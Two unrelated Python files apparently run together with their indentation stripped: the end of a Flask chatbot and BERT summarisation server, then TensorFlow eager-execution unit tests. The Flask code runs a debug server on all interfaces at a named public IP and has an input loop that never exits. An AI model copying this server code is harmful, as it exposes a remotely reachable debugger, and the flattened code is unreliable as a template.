raw_text = request.args.get('raw_text') # http://213.159.215.173:5000/predict?raw_text=how
print('########### raw_text: ', raw_text)
while not raw_text:
print('Prompt should not be empty!')
raw_text = input(">>> ")
history.append(tokenizer.encode(raw_text))
with torch.no_grad():
out_ids = interact.sample_sequence(personality, history, tokenizer, model, args2)
history.append(out_ids)
history = history[-(2 * args2.max_history + 1):]
out_text = tokenizer.decode(out_ids, skip_special_tokens=True)
print(out_text)
return jsonify({'q': raw_text, 'a': out_text})
@app.route('/get_summary', methods=['GET', 'POST'])
def get_summary():
if request.method == 'POST':
raw_text = request.args.get('raw_text') # http://213.159.215.173:5000/get_summary?raw_text=how
# print('########### raw_text: ', raw_text)
while not raw_text:
print('Prompt should not be empty!')
file1 = open("../raw_data/raw_text.txt", "w+")
file1.write(str(raw_text.encode('utf-8'))) # Hello \n s.encode('utf-8').decode('latin-1')
file1.close()
#############
# некоторые аргс изменены в соответствии с парамтерами запуска на инференс:
# python train.py -task abs -mode test_text -text_src '../raw_data/naked_photos_petapixel.txt' -bert_data_path '../bert_data/' -ext_dropout 0.1 -model_path '../models/' -test_from '../models/model_step_154000.pt' -lr 2e-3 -visible_gpus -1 -report_every 50 -save_checkpoint_steps 1000 -batch_size 140 -train_steps 50000 -accum_count 2 -log_file ../logs/abs_bert -use_interval true -warmup_steps 10000 -max_pos 512 -max_length 200 -alpha 0.95 -min_length 50 -result_path '../results/cnndm' -test_all True
#############
parser = argparse.ArgumentParser()
parser.add_argument("-task", default='abs', type=str, choices=['ext', 'abs'])
parser.add_argument("-encoder", default='bert', type=str, choices=['bert', 'baseline'])
parser.add_argument("-mode", default='test_text', type=str, choices=['train', 'validate', 'test', 'test_text'])
parser.add_argument("-bert_data_path", default='../bert_data/')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-text_src", default='../raw_data/raw_text.txt')
parser.add_argument("-text_tgt", default='')
parser.add_argument("-batch_size", default=140, type=int)
parser.add_argument("-test_batch_size", default=200, type=int)
parser.add_argument("-max_ndocs_in_batch", default=6, type=int)
parser.add_argument("-max_pos", default=512, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-large", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-load_from_extractive", default='', type=str)
parser.add_argument("-sep_optim", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-lr_bert", default=2e-3, type=float)
parser.add_argument("-lr_dec", default=2e-3, type=float)
parser.add_argument("-use_bert_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-share_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-finetune_bert", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-dec_dropout", default=0.2, type=float)
parser.add_argument("-dec_layers", default=6, type=int)
parser.add_argument("-dec_hidden_size", default=768, type=int)
parser.add_argument("-dec_heads", default=8, type=int)
parser.add_argument("-dec_ff_size", default=2048, type=int)
parser.add_argument("-enc_hidden_size", default=512, type=int)
parser.add_argument("-enc_ff_size", default=512, type=int)
parser.add_argument("-enc_dropout", default=0.2, type=float)
parser.add_argument("-enc_layers", default=6, type=int)
# params for EXT
parser.add_argument("-ext_dropout", default=0.1, type=float)
parser.add_argument("-ext_layers", default=2, type=int)
parser.add_argument("-ext_hidden_size", default=768, type=int)
parser.add_argument("-ext_heads", default=8, type=int)
parser.add_argument("-ext_ff_size", default=2048, type=int)
parser.add_argument("-label_smoothing", default=0.1, type=float)
parser.add_argument("-generator_shard_size", default=32, type=int)
parser.add_argument("-alpha", default=0.6, type=float)
parser.add_argument("-beam_size", default=5, type=int)
parser.add_argument("-min_length", default=40, type=int)
parser.add_argument("-max_length", default=200, type=int)
parser.add_argument("-max_tgt_len", default=140, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default=0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-warmup_steps_bert", default=8000, type=int)
parser.add_argument("-warmup_steps_dec", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/abs_bert')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-test_from", default='../models/model_step_154000.pt')
parser.add_argument("-test_start_from", default=-1, type=int)
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
# Внимание, закомментил args = parser.parse_args() тк выдает ошибку при запуске с gunicorn https://github.com/benoitc/gunicorn/issues/1867
#args = parser.parse_args()
# Решение конфликта аргументов и гуникорн https://stackoverflow.com/questions/32802303/python-flask-gunicorn-error-unrecognized-arguments
args, unknown = parser.parse_known_args()
# самые важные аргументы для суммаризации:
# args = {'task': 'abs',
# 'mode': 'test_text',
# 'model_path': '../models/',
# 'result_path': '../results/cnndm',
# 'text_src': '../raw_data/raw_text.txt',
# 'device': 'cpu', # cuda
# 'test_from': '../models/model_step_154000.pt',
# 'visible_gpus': '-1',
# 'gpu_ranks': '0',
# 'log_file': '../logs/abs_bert',
# 'max_pos': 512,
# 'dec_ff_size': 2048,
# 'dec_dropout': 0.2,
# }
# args = Map(args)
args.gpu_ranks = [int(i) for i in range(len(args.visible_gpus.split(',')))]
args.world_size = len(args.gpu_ranks)
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if (args.task == 'abs'):
if (args.mode == 'train'):
train_abs(args, device_id)
elif (args.mode == 'validate'):
validate_abs(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
if (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test_abs(args, device_id, cp, step)
elif (args.mode == 'test_text'):
test_text_abs(args) # inference test_text_abs ONLY
elif (args.task == 'ext'):
if (args.mode == 'train'):
train_ext(args, device_id)
elif (args.mode == 'validate'):
validate_ext(args, device_id)
if (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test_ext(args, device_id, cp, step)
elif (args.mode == 'test_text'):
test_text_ext(args)
# текст саммари находится в results/cnndm.-1.candidate
f = open("../results/cnndm.-1.candidate", "r")
if f.mode == 'r':
out_text = f.read()
from nltk.tokenize import sent_tokenize
out_text = out_text.replace('<q>', '. ')
input_sen = out_text # 'hello! how are you? please remember capitalization. EVERY time.'
sentences = sent_tokenize(input_sen)
sentences = [sent.capitalize() for sent in sentences]
print(sentences)
text_summary = ' '.join([str(elem) for elem in sentences])
return jsonify({'text_full': raw_text, 'text_summary': text_summary})
if request.method == 'GET':
raw_text = request.args.get('raw_text') # http://213.159.215.173:5000/get_summary?raw_text=how
# print('########### raw_text: ', raw_text)
while not raw_text:
print('Prompt should not be empty!')
file1 = open("../raw_data/raw_text.txt", "w+")
file1.write(str(raw_text.encode('utf-8'))) # Hello \n s.encode('utf-8').decode('latin-1')
file1.close()
#############
# некоторые аргс изменены в соответствии с парамтерами запуска на инференс:
# python train.py -task abs -mode test_text -text_src '../raw_data/naked_photos_petapixel.txt' -bert_data_path '../bert_data/' -ext_dropout 0.1 -model_path '../models/' -test_from '../models/model_step_154000.pt' -lr 2e-3 -visible_gpus -1 -report_every 50 -save_checkpoint_steps 1000 -batch_size 140 -train_steps 50000 -accum_count 2 -log_file ../logs/abs_bert -use_interval true -warmup_steps 10000 -max_pos 512 -max_length 200 -alpha 0.95 -min_length 50 -result_path '../results/cnndm' -test_all True
#############
parser = argparse.ArgumentParser()
parser.add_argument("-task", default='abs', type=str, choices=['ext', 'abs'])
parser.add_argument("-encoder", default='bert', type=str, choices=['bert', 'baseline'])
parser.add_argument("-mode", default='test_text', type=str, choices=['train', 'validate', 'test', 'test_text'])
parser.add_argument("-bert_data_path", default='../bert_data/')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-text_src", default='../raw_data/raw_text.txt')
parser.add_argument("-text_tgt", default='')
parser.add_argument("-batch_size", default=140, type=int)
parser.add_argument("-test_batch_size", default=200, type=int)
parser.add_argument("-max_ndocs_in_batch", default=6, type=int)
parser.add_argument("-max_pos", default=512, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-large", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-load_from_extractive", default='', type=str)
parser.add_argument("-sep_optim", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-lr_bert", default=2e-3, type=float)
parser.add_argument("-lr_dec", default=2e-3, type=float)
parser.add_argument("-use_bert_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-share_emb", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument("-finetune_bert", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-dec_dropout", default=0.2, type=float)
parser.add_argument("-dec_layers", default=6, type=int)
parser.add_argument("-dec_hidden_size", default=768, type=int)
parser.add_argument("-dec_heads", default=8, type=int)
parser.add_argument("-dec_ff_size", default=2048, type=int)
parser.add_argument("-enc_hidden_size", default=512, type=int)
parser.add_argument("-enc_ff_size", default=512, type=int)
parser.add_argument("-enc_dropout", default=0.2, type=float)
parser.add_argument("-enc_layers", default=6, type=int)
# params for EXT
parser.add_argument("-ext_dropout", default=0.1, type=float)
parser.add_argument("-ext_layers", default=2, type=int)
parser.add_argument("-ext_hidden_size", default=768, type=int)
parser.add_argument("-ext_heads", default=8, type=int)
parser.add_argument("-ext_ff_size", default=2048, type=int)
parser.add_argument("-label_smoothing", default=0.1, type=float)
parser.add_argument("-generator_shard_size", default=32, type=int)
parser.add_argument("-alpha", default=0.6, type=float)
parser.add_argument("-beam_size", default=5, type=int)
parser.add_argument("-min_length", default=40, type=int)
parser.add_argument("-max_length", default=200, type=int)
parser.add_argument("-max_tgt_len", default=140, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default=0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-warmup_steps_bert", default=8000, type=int)
parser.add_argument("-warmup_steps_dec", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?', const=True, default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/abs_bert')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-test_from", default='../models/model_step_154000.pt')
parser.add_argument("-test_start_from", default=-1, type=int)
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?', const=True, default=True)
parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
# Внимание, закомментил args = parser.parse_args() тк выдает ошибку при запуске с gunicorn https://github.com/benoitc/gunicorn/issues/1867
#args = parser.parse_args()
# Решение конфликта аргументов и гуникорн https://stackoverflow.com/questions/32802303/python-flask-gunicorn-error-unrecognized-arguments
args, unknown = parser.parse_known_args()
# самые важные аргументы для суммаризации:
# args = {'task': 'abs',
# 'mode': 'test_text',
# 'model_path': '../models/',
# 'result_path': '../results/cnndm',
# 'text_src': '../raw_data/raw_text.txt',
# 'device': 'cpu', # cuda
# 'test_from': '../models/model_step_154000.pt',
# 'visible_gpus': '-1',
# 'gpu_ranks': '0',
# 'log_file': '../logs/abs_bert',
# 'max_pos': 512,
# 'dec_ff_size': 2048,
# 'dec_dropout': 0.2,
# }
# args = Map(args)
args.gpu_ranks = [int(i) for i in range(len(args.visible_gpus.split(',')))]
args.world_size = len(args.gpu_ranks)
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if (args.task == 'abs'):
if (args.mode == 'train'):
train_abs(args, device_id)
elif (args.mode == 'validate'):
validate_abs(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
if (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test_abs(args, device_id, cp, step)
elif (args.mode == 'test_text'):
test_text_abs(args) # inference test_text_abs ONLY
elif (args.task == 'ext'):
if (args.mode == 'train'):
train_ext(args, device_id)
elif (args.mode == 'validate'):
validate_ext(args, device_id)
if (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test_ext(args, device_id, cp, step)
elif (args.mode == 'test_text'):
test_text_ext(args)
# текст саммари находится в results/cnndm.-1.candidate
f = open("../results/cnndm.-1.candidate", "r")
if f.mode == 'r':
out_text = f.read()
from nltk.tokenize import sent_tokenize
out_text = out_text.replace('<q>', '. ')
input_sen = out_text # 'hello! how are you? please remember capitalization. EVERY time.'
sentences = sent_tokenize(input_sen)
sentences = [sent.capitalize() for sent in sentences]
print(sentences)
text_summary = ' '.join([str(elem) for elem in sentences])
return jsonify({'text_full': raw_text, 'text_summary': text_summary})
@socketio.on('my event', namespace='/my_namespace')
# this method is invoked when an event called
# 'my event' is is triggered
def test_message(message):
# this triggers new event called 'i said'
emit('i said ', {'data': message['data']})
if __name__ == '__main__':
gunicorn_logger = logging.getLogger('gunicorn.error')
app.logger.handlers = gunicorn_logger.handlers
app.logger.setLevel(gunicorn_logger.level)
# на локальном сервере работает
#app.run(debug=True)#socketio.run(app, debug=True) #app.run()
# на моем сервере firstvds jason
# Внимание, запускать python app.py а не FLASK_APP=app.py flask run тк запустится как локалхост и будет ошибка 111 requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionRefusedError(111, 'Connection refused'))
# dev server
# app.run(host = '0.0.0.0', port = 5000, debug = True)
# gunicorn
app.run(host = '0.0.0.0', port = 5005, debug = True) # 0.0.0.0 213.159.215.173 # 35.202.164.44
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
class TFETest(test_util.TensorFlowTestCase):
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.ASYNC)
self.assertEqual(context.ASYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.SYNC)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
with ctx.execution_mode(context.ASYNC):
self.assertEqual(context.ASYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.SYNC)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
self.assertIsNone(ctx.summary_writer_resource)
ctx.summary_writer_resource = 'mock'
self.assertEqual('mock', ctx.summary_writer_resource)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testRunMetadata(self):
context.enable_run_metadata()
t = constant_op.constant(1.0)
_ = t + t # Runs an operation which will be in the RunMetadata
run_metadata = context.export_run_metadata()
context.disable_run_metadata()
step_stats = run_metadata.step_stats
self.assertGreater(len(step_stats.dev_stats), 0)
cpu_stats = step_stats.dev_stats[0]
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
cpu_stats.device)
self.assertGreaterEqual(len(cpu_stats.node_stats), 1)
def testShouldCopy(self):
if not context.context().num_gpus():
self.skipTest('No devices other than CPUs found')
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
def testInt32GPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(), ctx.scope_name, ctx.summary_writer_resource,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
def testContextConfig(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
def testResourceTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
def testCopyBetweenDevices(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
def testCopyBetweenDevicesAsync(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.async_wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.async_wait()
context.async_clear_error()
def testCopyScope(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.context().device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testNumpyForceCPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO (agarwal): add tests passing incorrect typed values to attrs. id:3662
# https://github.com/imdone/tensorflow/issues/3661
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.async_wait()
context.async_clear_error()
context.set_execution_mode(context.SYNC)
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
def testMatMulGPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
